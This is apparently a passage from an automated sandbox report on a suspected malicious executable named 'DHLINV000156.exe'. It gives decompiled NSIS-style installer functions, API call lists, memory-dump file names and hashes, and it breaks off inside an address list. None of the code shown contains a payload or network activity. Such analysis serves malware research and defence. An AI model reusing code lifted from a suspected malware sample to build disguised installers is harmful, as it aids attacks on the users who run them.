                                        0x00404c27
                                        0x00404c35
                                        0x00404c3f
                                        0x00404c41
                                        0x00404c47
                                        0x00404c4e
                                        0x00404c51
                                        0x00404c59
                                        0x00404c59
                                        0x00404c22
                                        0x00404c91
                                        0x00404c92
                                        0x00404c9e
                                        0x00404c9e
                                        0x00404caa
                                        0x00404cc5
                                        0x00404cc8
                                        0x00404ce5
                                        0x00000000
                                        0x00404cca
                                        0x00404ccf
                                        0x00404cd8
                                        0x00405060
                                        0x00405072
                                        0x00405072
                                        0x00404cc8
                                        0x00000000
                                        0x00404caa
                                        0x00404bdd

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
                                        • Instruction ID: 966653e8360bab3e2fc21879108ab338c3bc3285e0cd99f232f5bc98bb3d6c0f
                                        • Opcode Fuzzy Hash: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
                                        • Instruction Fuzzy Hash: 86025CB0900209AFDB10DF64DC45AAE7BB9FB84314F10813AFA15BA2E0D7799E41DF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E004041D3(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                        				intOrPtr _v8;
                                        				signed int _v12;
                                        				void* _v16;
                                        				struct HWND__* _t52;
                                        				long _t86;
                                        				int _t98;
                                        				struct HWND__* _t99;
                                        				signed int _t100;
                                        				intOrPtr _t103;
                                        				signed int _t106;
                                        				intOrPtr _t107;
                                        				intOrPtr _t109;
                                        				int _t110;
                                        				signed int* _t112;
                                        				signed int _t113;
                                        				char* _t114;
                                        				CHAR* _t115;
                                        
                                        				if(_a8 != 0x110) {
                                        					__eflags = _a8 - 0x111;
                                        					if(_a8 != 0x111) {
                                        						L11:
                                        						__eflags = _a8 - 0x4e;
                                        						if(_a8 != 0x4e) {
                                        							__eflags = _a8 - 0x40b;
                                        							if(_a8 == 0x40b) {
                                        								 *0x41ecd4 =  *0x41ecd4 + 1;
                                        								__eflags =  *0x41ecd4;
                                        							}
                                        							L25:
                                        							_t110 = _a16;
                                        							L26:
                                        							return E004040CF(_a8, _a12, _t110);
                                        						}
                                        						_t52 = GetDlgItem(_a4, 0x3e8);
                                        						_t110 = _a16;
                                        						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                        						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                        							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                        							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                        								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                        								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                        								_v12 = _t100;
                                        								__eflags = _t100 - _t109 - 0x800;
                                        								_v16 = _t109;
                                        								_v8 = 0x4226a0;
                                        								if(_t100 - _t109 < 0x800) {
                                        									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                        									SetCursor(LoadCursorA(0, 0x7f02));
                                        									_push(1);
                                        									E00404477(_a4, _v8);
                                        									SetCursor(LoadCursorA(0, 0x7f00));
                                        									_t110 = _a16;
                                        								}
                                        							}
                                        						}
                                        						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                        						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                        							goto L26;
                                        						} else {
                                        							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                        							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                        								goto L26;
                                        							}
                                        							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                        								SendMessageA( *0x423708, 0x111, 1, 0);
                                        							}
                                        							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                        							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                        								SendMessageA( *0x423708, 0x10, 0, 0);
                                        							}
                                        							return 1;
                                        						}
                                        					}
                                        					__eflags = _a12 >> 0x10;
                                        					if(_a12 >> 0x10 != 0) {
                                        						goto L25;
                                        					}
                                        					__eflags =  *0x41ecd4; // 0x0
                                        					if(__eflags != 0) {
                                        						goto L25;
                                        					}
                                        					_t103 =  *0x41f4e0; // 0x4ea08c
                                        					_t25 = _t103 + 0x14; // 0x4ea0a0
                                        					_t112 = _t25;
                                        					__eflags =  *_t112 & 0x00000020;
                                        					if(( *_t112 & 0x00000020) == 0) {
                                        						goto L25;
                                        					}
                                        					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                        					__eflags = _t106;
                                        					 *_t112 = _t106;
                                        					E0040408A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                        					E00404453();
                                        					goto L11;
                                        				} else {
                                        					_t98 = _a16;
                                        					_t113 =  *(_t98 + 0x30);
                                        					if(_t113 < 0) {
                                        						_t107 =  *0x422edc; // 0x4ebb51
                                        						_t113 =  *(_t107 - 4 + _t113 * 4);
                                        					}
                                        					_push( *((intOrPtr*)(_t98 + 0x34)));
                                        					_t114 = _t113 +  *0x423758;
                                        					_push(0x22);
                                        					_a16 =  *_t114;
                                        					_v12 = _v12 & 0x00000000;
                                        					_t115 = _t114 + 1;
                                        					_v16 = _t115;
                                        					_v8 = E0040419E;
                                        					E00404068(_a4);
                                        					_push( *((intOrPtr*)(_t98 + 0x38)));
                                        					_push(0x23);
                                        					E00404068(_a4);
                                        					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                        					E0040408A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                        					_t99 = GetDlgItem(_a4, 0x3e8);
                                        					E0040409D(_t99);
                                        					SendMessageA(_t99, 0x45b, 1, 0);
                                        					_t86 =  *( *0x423714 + 0x68);
                                        					if(_t86 < 0) {
                                        						_t86 = GetSysColor( ~_t86);
                                        					}
                                        					SendMessageA(_t99, 0x443, 0, _t86);
                                        					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                        					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                        					 *0x41ecd4 = 0;
                                        					SendMessageA(_t99, 0x449, _a16,  &_v16);
                                        					 *0x41ecd4 = 0;
                                        					return 0;
                                        				}
                                        			}




















                                        0x004041e3
                                        0x004042f5
                                        0x00404308
                                        0x00404364
                                        0x00404364
                                        0x00404368
                                        0x0040442e
                                        0x00404435
                                        0x00404437
                                        0x00404437
                                        0x00404437
                                        0x0040443d
                                        0x0040443d
                                        0x00404440
                                        0x00000000
                                        0x00404447
                                        0x00404376
                                        0x00404378
                                        0x0040437b
                                        0x00404382
                                        0x00404384
                                        0x0040438b
                                        0x0040438d
                                        0x00404390
                                        0x00404393
                                        0x00404398
                                        0x0040439e
                                        0x004043a1
                                        0x004043a8
                                        0x004043b6
                                        0x004043ce
                                        0x004043d0
                                        0x004043d8
                                        0x004043e7
                                        0x004043e9
                                        0x004043e9
                                        0x004043a8
                                        0x0040438b
                                        0x004043ec
                                        0x004043f3
                                        0x00000000
                                        0x004043f5
                                        0x004043f5
                                        0x004043fc
                                        0x00000000
                                        0x00000000
                                        0x004043fe
                                        0x00404402
                                        0x00404413
                                        0x00404413
                                        0x00404415
                                        0x00404419
                                        0x00404427
                                        0x00404427
                                        0x00000000
                                        0x0040442b
                                        0x004043f3
                                        0x00404310
                                        0x00404313
                                        0x00000000
                                        0x00000000
                                        0x0040431b
                                        0x00404321
                                        0x00000000
                                        0x00000000
                                        0x00404327
                                        0x0040432d
                                        0x0040432d
                                        0x00404330
                                        0x00404333
                                        0x00000000
                                        0x00000000
                                        0x00404356
                                        0x00404356
                                        0x00404358
                                        0x0040435a
                                        0x0040435f
                                        0x00000000
                                        0x004041e9
                                        0x004041e9
                                        0x004041ec
                                        0x004041f1
                                        0x004041f3
                                        0x00404202
                                        0x00404202
                                        0x00404209
                                        0x0040420c
                                        0x0040420e
                                        0x00404213
                                        0x0040421c
                                        0x00404222
                                        0x0040422e
                                        0x00404231
                                        0x0040423a
                                        0x0040423f
                                        0x00404242
                                        0x00404247
                                        0x0040425e
                                        0x00404265
                                        0x00404278
                                        0x0040427b
                                        0x00404290
                                        0x00404297
                                        0x0040429c
                                        0x004042a1
                                        0x004042a1
                                        0x004042b0
                                        0x004042bf
                                        0x004042d1
                                        0x004042d6
                                        0x004042e6
                                        0x004042e8
                                        0x00000000
                                        0x004042ee

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: Call$N
                                        • API String ID: 3103080414-3438112850
                                        • Opcode ID: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
                                        • Instruction ID: a86fe1b261e308fa50e110e5a31abfd90c360c5de8850f7aae14d0f145b03158
                                        • Opcode Fuzzy Hash: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
                                        • Instruction Fuzzy Hash: 1561A0B1A00209BBEB109F61DD45F6A7B69FB84705F008036FB01BA2D1C7B8A951CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 90%
                                        			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                        				struct tagLOGBRUSH _v16;
                                        				struct tagRECT _v32;
                                        				struct tagPAINTSTRUCT _v96;
                                        				struct HDC__* _t70;
                                        				struct HBRUSH__* _t87;
                                        				struct HFONT__* _t94;
                                        				long _t102;
                                        				signed int _t126;
                                        				struct HDC__* _t128;
                                        				intOrPtr _t130;
                                        
                                        				if(_a8 == 0xf) {
                                        					_t130 =  *0x423714;
                                        					_t70 = BeginPaint(_a4,  &_v96);
                                        					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                        					_a8 = _t70;
                                        					GetClientRect(_a4,  &_v32);
                                        					_t126 = _v32.bottom;
                                        					_v32.bottom = _v32.bottom & 0x00000000;
                                        					while(_v32.top < _t126) {
                                        						_a12 = _t126 - _v32.top;
                                        						asm("cdq");
                                        						asm("cdq");
                                        						asm("cdq");
                                        						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                        						_t87 = CreateBrushIndirect( &_v16);
                                        						_v32.bottom = _v32.bottom + 4;
                                        						_a16 = _t87;
                                        						FillRect(_a8,  &_v32, _t87);
                                        						DeleteObject(_a16);
                                        						_v32.top = _v32.top + 4;
                                        					}
                                        					if( *(_t130 + 0x58) != 0xffffffff) {
                                        						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                        						_a16 = _t94;
                                        						if(_t94 != 0) {
                                        							_t128 = _a8;
                                        							_v32.left = 0x10;
                                        							_v32.top = 8;
                                        							SetBkMode(_t128, 1);
                                        							SetTextColor(_t128,  *(_t130 + 0x58));
                                        							_a8 = SelectObject(_t128, _a16);
                                        							DrawTextA(_t128, 0x422f00, 0xffffffff,  &_v32, 0x820);
                                        							SelectObject(_t128, _a8);
                                        							DeleteObject(_a16);
                                        						}
                                        					}
                                        					EndPaint(_a4,  &_v96);
                                        					return 0;
                                        				}
                                        				_t102 = _a16;
                                        				if(_a8 == 0x46) {
                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x423708;
                                        				}
                                        				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                        			}













                                        0x0040100a
                                        0x00401039
                                        0x00401047
                                        0x0040104d
                                        0x00401051
                                        0x0040105b
                                        0x00401061
                                        0x00401064
                                        0x004010f3
                                        0x00401089
                                        0x0040108c
                                        0x004010a6
                                        0x004010bd
                                        0x004010cc
                                        0x004010cf
                                        0x004010d5
                                        0x004010d9
                                        0x004010e4
                                        0x004010ed
                                        0x004010ef
                                        0x004010ef
                                        0x00401100
                                        0x00401105
                                        0x0040110d
                                        0x00401110
                                        0x00401112
                                        0x00401118
                                        0x0040111f
                                        0x00401126
                                        0x00401130
                                        0x00401142
                                        0x00401156
                                        0x00401160
                                        0x00401165
                                        0x00401165
                                        0x00401110
                                        0x0040116e
                                        0x00000000
                                        0x00401178
                                        0x00401010
                                        0x00401013
                                        0x00401015
                                        0x0040101f
                                        0x0040101f
                                        0x00000000

                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32 ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32 ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
                                        • Instruction ID: e0713781b635691343a74aeb4589e3ea90c77733c460a74728c978b7faf409cc
                                        • Opcode Fuzzy Hash: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
                                        • Instruction Fuzzy Hash: A7419C71804249AFCF058FA4CD459BFBFB9FF44310F00812AF561AA2A0C738AA50DFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405C49(void* __ecx) {
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				long _t12;
                                        				long _t24;
                                        				char* _t31;
                                        				int _t37;
                                        				void* _t38;
                                        				intOrPtr* _t39;
                                        				long _t42;
                                        				CHAR* _t44;
                                        				void* _t46;
                                        				void* _t48;
                                        				void* _t49;
                                        				void* _t52;
                                        				void* _t53;
                                        
                                        				_t38 = __ecx;
                                        				_t44 =  *(_t52 + 0x14);
                                        				 *0x421a98 = 0x4c554e;
                                        				if(_t44 == 0) {
                                        					L3:
                                        					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x421e98, 0x400);
                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                        						_t37 = wsprintfA(0x421698, "%s=%s\r\n", 0x421a98, 0x421e98);
                                        						_t53 = _t52 + 0x10;
                                        						E00405FFC(_t37, 0x400, 0x421e98, 0x421e98,  *((intOrPtr*)( *0x423714 + 0x128)));
                                        						_t12 = E00405B73(0x421e98, 0xc0000000, 4);
                                        						_t48 = _t12;
                                        						 *(_t53 + 0x18) = _t48;
                                        						if(_t48 != 0xffffffff) {
                                        							_t42 = GetFileSize(_t48, 0);
                                        							_t6 = _t37 + 0xa; // 0xa
                                        							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                        							if(_t46 == 0 || E00405BEB(_t48, _t46, _t42) == 0) {
                                        								L18:
                                        								return CloseHandle(_t48);
                                        							} else {
                                        								if(E00405AD8(_t38, _t46, "[Rename]\r\n") != 0) {
                                        									_t49 = E00405AD8(_t38, _t21 + 0xa, 0x4093b8);
                                        									if(_t49 == 0) {
                                        										_t48 =  *(_t53 + 0x18);
                                        										L16:
                                        										_t24 = _t42;
                                        										L17:
                                        										E00405B2E(_t24 + _t46, 0x421698, _t37);
                                        										SetFilePointer(_t48, 0, 0, 0);
                                        										E00405C1A(_t48, _t46, _t42 + _t37);
                                        										GlobalFree(_t46);
                                        										goto L18;
                                        									}
                                        									_t39 = _t46 + _t42;
                                        									_t31 = _t39 + _t37;
                                        									while(_t39 > _t49) {
                                        										 *_t31 =  *_t39;
                                        										_t31 = _t31 - 1;
                                        										_t39 = _t39 - 1;
                                        									}
                                        									_t24 = _t49 - _t46 + 1;
                                        									_t48 =  *(_t53 + 0x18);
                                        									goto L17;
                                        								}
                                        								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                        								_t42 = _t42 + 0xa;
                                        								goto L16;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					CloseHandle(E00405B73(_t44, 0, 1));
                                        					_t12 = GetShortPathNameA(_t44, 0x421a98, 0x400);
                                        					if(_t12 != 0 && _t12 <= 0x400) {
                                        						goto L3;
                                        					}
                                        				}
                                        				return _t12;
                                        			}



















                                        0x00405c49
                                        0x00405c52
                                        0x00405c59
                                        0x00405c6d
                                        0x00405c95
                                        0x00405ca0
                                        0x00405ca4
                                        0x00405cc4
                                        0x00405ccb
                                        0x00405cd5
                                        0x00405ce2
                                        0x00405ce7
                                        0x00405cec
                                        0x00405cf0
                                        0x00405cff
                                        0x00405d01
                                        0x00405d0e
                                        0x00405d12
                                        0x00405dad
                                        0x00000000
                                        0x00405d28
                                        0x00405d35
                                        0x00405d59
                                        0x00405d5d
                                        0x00405d7c
                                        0x00405d80
                                        0x00405d80
                                        0x00405d82
                                        0x00405d8b
                                        0x00405d96
                                        0x00405da1
                                        0x00405da7
                                        0x00000000
                                        0x00405da7
                                        0x00405d5f
                                        0x00405d62
                                        0x00405d6d
                                        0x00405d69
                                        0x00405d6b
                                        0x00405d6c
                                        0x00405d6c
                                        0x00405d74
                                        0x00405d76
                                        0x00000000
                                        0x00405d76
                                        0x00405d40
                                        0x00405d46
                                        0x00000000
                                        0x00405d46
                                        0x00405d12
                                        0x00405cf0
                                        0x00405c6f
                                        0x00405c7a
                                        0x00405c83
                                        0x00405c87
                                        0x00000000
                                        0x00000000
                                        0x00405c87
                                        0x00405db8

                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DDA,?,?), ref: 00405C7A
                                        • GetShortPathNameA.KERNEL32 ref: 00405C83
                                          • Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
                                          • Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A
                                        • GetShortPathNameA.KERNEL32 ref: 00405CA0
                                        • wsprintfA.USER32 ref: 00405CBE
                                        • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405CF9
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D08
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D40
                                        • SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D96
                                        • GlobalFree.KERNEL32 ref: 00405DA7
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DAE
                                          • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\DHLINV000156.exe,80000000,00000003), ref: 00405B77
                                          • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %s=%s$[Rename]
                                        • API String ID: 2171350718-1727408572
                                        • Opcode ID: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
                                        • Instruction ID: 6ce2b9c5035192946699426d8eaee961ce023100f281e1c8236941499ee81097
                                        • Opcode Fuzzy Hash: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
                                        • Instruction Fuzzy Hash: 19311331605B19ABD6207B659C4CFAB3A6CDF45714F14003BFA01FA2D2E67CA8018EBD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 89%
                                        			E73EF24D8(intOrPtr* _a4) {
                                        				char _v80;
                                        				int _v84;
                                        				intOrPtr _v88;
                                        				short _v92;
                                        				intOrPtr* _t28;
                                        				void* _t30;
                                        				intOrPtr _t31;
                                        				signed int _t43;
                                        				void* _t44;
                                        				intOrPtr _t45;
                                        				void* _t48;
                                        
                                        				_t44 = E73EF1215();
                                        				_t28 = _a4;
                                        				_t45 =  *((intOrPtr*)(_t28 + 0x814));
                                        				_v88 = _t45;
                                        				_t48 = (_t45 + 0x41 << 5) + _t28;
                                        				do {
                                        					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
                                        					}
                                        					_t43 =  *(_t48 - 8) & 0x000000ff;
                                        					if(_t43 <= 7) {
                                        						switch( *((intOrPtr*)(_t43 * 4 +  &M73EF2626))) {
                                        							case 0:
                                        								 *_t44 = 0;
                                        								goto L17;
                                        							case 1:
                                        								__eax =  *__eax;
                                        								if(__ecx > __ebx) {
                                        									_v84 = __ecx;
                                        									__ecx =  *(0x73ef307c + __edx * 4);
                                        									__edx = _v84;
                                        									__ecx = __ecx * __edx;
                                        									asm("sbb edx, edx");
                                        									__edx = __edx & __ecx;
                                        									__eax = __eax &  *(0x73ef309c + __edx * 4);
                                        								}
                                        								_push(__eax);
                                        								goto L15;
                                        							case 2:
                                        								__eax = E73EF1429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                        								goto L16;
                                        							case 3:
                                        								__eax = lstrcpynA(__edi,  *__eax,  *0x73ef405c);
                                        								goto L17;
                                        							case 4:
                                        								__ecx =  *0x73ef405c;
                                        								__edx = __ecx - 1;
                                        								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
                                        								__eax =  *0x73ef405c;
                                        								 *((char*)(__eax + __edi - 1)) = __bl;
                                        								goto L17;
                                        							case 5:
                                        								__ecx =  &_v80;
                                        								_push(0x27);
                                        								_push(__ecx);
                                        								_push( *__eax);
                                        								" {xv@uxv"();
                                        								__eax =  &_v92;
                                        								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x73ef405c, __ebx, __ebx);
                                        								goto L17;
                                        							case 6:
                                        								_push( *__esi);
                                        								L15:
                                        								__eax = wsprintfA(__edi, 0x73ef4000);
                                        								L16:
                                        								__esp = __esp + 0xc;
                                        								goto L17;
                                        						}
                                        					}
                                        					L17:
                                        					_t30 =  *(_t48 + 0x14);
                                        					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
                                        						GlobalFree(_t30);
                                        					}
                                        					_t31 =  *((intOrPtr*)(_t48 + 0xc));
                                        					if(_t31 != 0) {
                                        						if(_t31 != 0xffffffff) {
                                        							if(_t31 > 0) {
                                        								E73EF12D1(_t31 - 1, _t44);
                                        								goto L26;
                                        							}
                                        						} else {
                                        							E73EF1266(_t44);
                                        							L26:
                                        						}
                                        					}
                                        					_v88 = _v88 - 1;
                                        					_t48 = _t48 - 0x20;
                                        				} while (_v88 >= 0);
                                        				return GlobalFree(_t44);
                                        			}














                                        0x73ef24e4
                                        0x73ef24e6
                                        0x73ef24f0
                                        0x73ef24f6
                                        0x73ef2500
                                        0x73ef2504
                                        0x73ef2509
                                        0x73ef2509
                                        0x73ef2511
                                        0x73ef2518
                                        0x73ef251e
                                        0x00000000
                                        0x73ef2525
                                        0x00000000
                                        0x00000000
                                        0x73ef252c
                                        0x73ef2530
                                        0x73ef2533
                                        0x73ef2537
                                        0x73ef253e
                                        0x73ef2542
                                        0x73ef2548
                                        0x73ef254a
                                        0x73ef254c
